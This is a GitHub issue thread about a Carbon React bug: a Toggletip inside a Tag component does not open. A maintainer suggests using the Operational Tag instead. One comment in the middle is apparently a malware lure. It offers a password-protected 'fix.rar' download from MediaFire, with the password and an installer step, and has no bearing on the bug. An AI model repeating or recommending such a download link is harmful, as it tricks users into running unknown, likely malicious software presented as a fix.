### ISSUE TITLE
[Bug]: toggletip will not be open when it is inside a tag component

### ISSUE THREAD

**Issue by jingx-xue** [carbon-design-system/carbon#17273]
### Package

@carbon/react

### Browser

Chrome

### Package version

1.63.2

### React version

16.14.0

### Description

unable to use a ToogleTip inside a Tag component
- toggletip will not be open when it is inside a tag component

### Reproduction/example

https://stackblitz.com/edit/github-ksqxo8?file=src%2Findex.scss,src%2FApp.jsx&preset=node=

### Steps to reproduce

- with the stackblitz example
- click on the tag
- you will not see a toogle tip been open

### Suggested Severity

Severity 2 = User cannot complete task, and/or no workaround within the user experience of a given component.

### Code of Conduct

- [X] I agree to follow this project's [Code of Conduct](https://github.com/carbon-design-system/carbon/blob/f555616971a03fd454c0f4daea184adf41fff05b/.github/CODE_OF_CONDUCT.md)
- [X] I checked the [current issues](https://github.com/carbon-design-system/carbon/issues) for duplicate problems

**Comment by MinecraftEarthVillage** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by guidari** [comment]
Hey @jingx-xue 
We recommend using Operational Tag for your use case. Tag now is only for read-only, as for the Operational Tag you can have user interaction.
Check this example on [storybook](https://react.carbondesignsystem.com/?path=/story/experimental-unstable-interactivetag--operational) that is using Popover to match a11y requirements.
